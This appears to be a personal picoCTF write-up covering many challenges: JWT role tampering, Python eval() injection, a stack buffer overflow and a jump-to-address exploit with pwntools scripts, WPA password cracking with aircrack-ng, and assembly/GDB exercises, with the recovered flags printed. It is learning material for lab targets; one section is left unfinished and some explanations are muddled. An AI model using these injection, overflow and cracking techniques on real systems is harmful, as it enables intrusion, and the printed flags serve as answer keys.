└─$ strings * | grep -r "pico"
strings: Warning: 'big-zip-files' is a directory
grep: files.zip: binary file matches
big-zip-files/folder_pmbymkjcya/folder_cawigcwvgv/folder_ltdayfmktr/folder_fnpfclfyee/whzxrpivpqld.txt:information on the record will last a billion years. Genes and brains and books encode picoCTF{gr3p_15_m4g1c_ef8790dc}
==picoCTF{gr3p_15_m4g1c_ef8790dc}==
ASCII Numbers
Description
Convert the following string of ASCII numbers into a readable string:
Description
Most web application developers use third party components without testing their security. Some of the past affected companies are:
Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one? The website is running here. Can you become an admin? You can log in as test with the password Test123! to get started.
Initial Analysis
We can login user test:Test123! .
Checking via cookies, it was a Jason Web Token (JWT)
It also mentions past vulnerabilities where it can tamper roles from user to admin.
When I initially encountered this problem, I noticed that the second hint mentioned two parts. Upon reviewing my JWT token, I realized it only consisted of one part. How can I make it two parts? The solution is to separate it with a dot (.).
==picoCTF{succ3ss_@u7h3nt1c@710n_72bf8bd5}==
RE
ASCII FTW
Description
This program has constructed the flag using hex ASCII values. Identify the flag text by disassembling the program. You can download the file from here.
By understanding how this program works and looking into ghidra, it can conclude that this assembly never been call but it contains flags.
==picoCTF{ASCII_IS_EASY_3CF4BFAD}==
Bit-O-Asm-1
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
The first top line was dummy since it not touch any value in EAX, Then mov eax,0x30. which mean copy value 0x30 into EAX.
The answer is 0x30 (48)
==picoCTF{48}==
Bit-O-Asm-2
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
Same as previous, but this time it refer to [rbp-0x4]. Refer to line 15, it copy the value 0x9fe1a(654874).
==picoCTF{654874}==
Bit-O-Asm-3
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
Description
Can you figure out what is in the eax register? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Download the assembly dump here.
rbp-0x4 = 0x9fe1a
cmp = mean compare, (0x9fe1a <operator> 0x2710)
operator = jle (<=)
(0x9fe1a <= 0x2710)
if true sub with 0x65
else add with 0x65
It return true then the subtration operation happen.
==picoCTF{654773}==
Picker I
Description
This service can provide you with a random number, but can it do anything else? Connect to the program with netcat: $ nc saturn.picoctf.net 55986 The program's source code can be downloaded here.
while(True):
try:
print('Try entering "getRandomNumber" without the double quotes...')
user_input = input('==> ')
eval(user_input + '()')
except Exception as e:
print(e)
This code is vulnerable because it uses eval(). Looking into win() and that is our target.
Try entering "getRandomNumber" without the double quotes...
==> getRandomNumber
4
Try entering "getRandomNumber" without the double quotes...
==> win
[Errno 2] No such file or directory: 'flag.txt'
Try entering "getRandomNumber" without the double quotes...
==> print(open('flag.txt', 'r').read())
[Errno 2] No such file or directory: 'flag.txt'
Simple script,
from pwn import *
r = remote('saturn.picoctf.net', 55986)
r.sendlineafter('quotes...',b'win')
get = r.interactive()
==picoCTF{4_d14m0nd_1n_7h3_r0ugh_b523b2a1}==
Picker II
Description
Can you figure out how this program works to get the flag?
def filter(user_input):
if 'win' in user_input:
return False
return True
while(True):
try:
user_input = input('==> ')
if( filter(user_input) ):
eval(user_input + '()')
else:
print('Illegal input')
except Exception as e:
print(e)
Same as picker-I, but this time the word WIN is being filtered. Bypass the function by calling the flag directly.
Description
Can you figure out how this program works to get the flag?
def reset_table():
global func_table
# This table is formatted for easier viewing, but it is really one line
func_table = \
\
print_table \
read_variable \
write_variable \
getRandomNumber \
---Snippet---
def read_variable():
var_name = input('Please enter variable name to read: ')
if( filter_var_name(var_name) ):
eval('print('+var_name+')')
else:
print('Illegal variable name')
def filter_value(value):
if ';' in value or '(' in value or ')' in value:
return False
else:
return True
def write_variable():
var_name = input('Please enter variable name to write: ')
if( filter_var_name(var_name) ):
value = input('Please enter new value of variable: ')
if( filter_value(value) ):
exec('global '+var_name+'; '+var_name+' = '+value)
else:
print('Illegal value')
else:
print('Illegal variable name')
From what can conclude, we cannot put previous payload since it to long. But there is some bug that i can use where create a new variable and run the variable.
IDEA
3 -> to create variable
win -> name it (can be anything)
open('flag.txt', 'r').read() -> need to modify since filtered.
"open" + "\x28" + "\"flag.txt\"" + "," + "\"r\"" + "\x29" + ".read" + "\x28" + "\x29"
2 -> to read variable
win -> our created variable.
That is how it will work, but im stucking in displaying the flag.
python3 picker-III.py
==> 3
Please enter variable name to write: win
Please enter new value of variable: "open" + "\x28" + "\"flag.txt\"" + "," + "\"r\"" + "\x29" + ".read" + "\x28" + "\x29"
==> 2
Please enter variable name to read: win
open("flag.txt","r").read()
TODO
GDB baby step 1
Description
Can you figure out what is in the eax register at the end of the main function? Put your answer in the picoCTF flag format: picoCTF{n} where n is the contents of the eax register in the decimal number base. If the answer was 0x11 your flag would be picoCTF{17}. Disassemble this.
set disassembly-flavor intel
break main
layout asm
r
break *0x401142
c
print/d $eax
==picoCTF{307019}==
Forensics
WPA-ing Out
Description
I thought that my password was super-secret, but it turns out that passwords passed over the AIR can be CRACKED, especially if I used the same wireless network password as one in the rockyou.txt credential dump. Use this 'pcap file' and the rockyou wordlist. The flag should be entered in the picoCTF{XXXXXX} format.
Initial Analysis
Open the pcap file and we notice protocol 802.11 which mean this is networking (Wi-Fi).
The challenge mention about password and wireless. We can use aircrack-ng to crack the password.
aircrack-ng wpa-ing_out.pcap -w /usr/share/wordlists/rockyou.txt
==picoCTF{mickeymouse}==
Binary/Pwn
Local Target
Description
Smash the stack
Can you overflow the buffer and modify the other local variable? The program is available here. You can view the source here. And connect with it using: nc saturn.picoctf.net 57499
Initial Analysis
char input[16];
int num = 64;
printf("Enter a string: ");
fflush(stdout);
gets(input);
printf("\n");
printf("num is %d\n", num);
fflush(stdout);
if( num == 65 ){
printf("You win!\n");
fflush(stdout);
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
There was a condition to meet where the num need to be 65. But there was no input/call for variable num. Only have input for strings.
Exploit directly using 16 + 8(since this 64 byte) = 24 char
echo -e 'AAAAAAAAAAAAAAAAAAAAAAAA\x41' | ./local-target
-- A contains of 24 bit. Which mean we already at stack. Then push /41(65) value into stack, that will call num = 65.
Using GDB (still new to me)
Launch using GDB
cylic 100
run + put cyclic value
cyclic -l RIP
cyclic -l (RBP)
For this we nee to use RBP since the flag call in main function. Still in the same stack.
Payload
from pwn import *
import os
#io = remote('saturn.picoctf.net', 64428)
io = process('./local-target')
# Padding is offset - 8 bytes.
padding = 24
p = flat([
asm('nop') * padding,
0x41 # send value 65 here.
])
io.sendlineafter(b':', p)
io.interactive()
==picoCTF{l0c4l5_1n_5c0p3_fee8ef05}==
Picker IV
Description
Can you figure out how this program works to get the flag? Connect to the program with netcat: $ nc saturn.picoctf.net 63096 The program's source code can be downloaded here. The binary can be downloaded here.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
The PIE is unable which means the memory address will be fix every time program run.
Checking the source code
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void print_segf_message(){
printf("Segfault triggered! Exiting.\n");
sleep(15);
exit(SIGSEGV);
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
--snippet--
int main() {
signal(SIGSEGV, print_segf_message);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
unsigned int val;
printf("Enter the address in hex to jump to, excluding '0x': ");
scanf("%x", &val);
printf("You input 0x%x\n", val);
void (*foo)(void) = (void (*)())val;
foo();
}
Got 2 function name as main and win. Briefly checking the main function, we known that we need to specifically enter address to jump/call.
It was direct and can be done using objdump
objdump -d picker-IV| grep win
Supply the address to the input.
./picker-IV
Enter the address in hex to jump to, excluding '0x': 0x40129e
You input 0x40129e
Using GDB
pwndbg> info functions win
All functions matching regular expression "win":
Non-debugging symbols:
0x000000000040129e win
Payload will look like
from pwn import *
#r = remote('',)
r = process("./picker-IV")
# 0x000000000040129e
win = b'40129e'
r.sendlineafter("'0x': ",win)
r.interactive()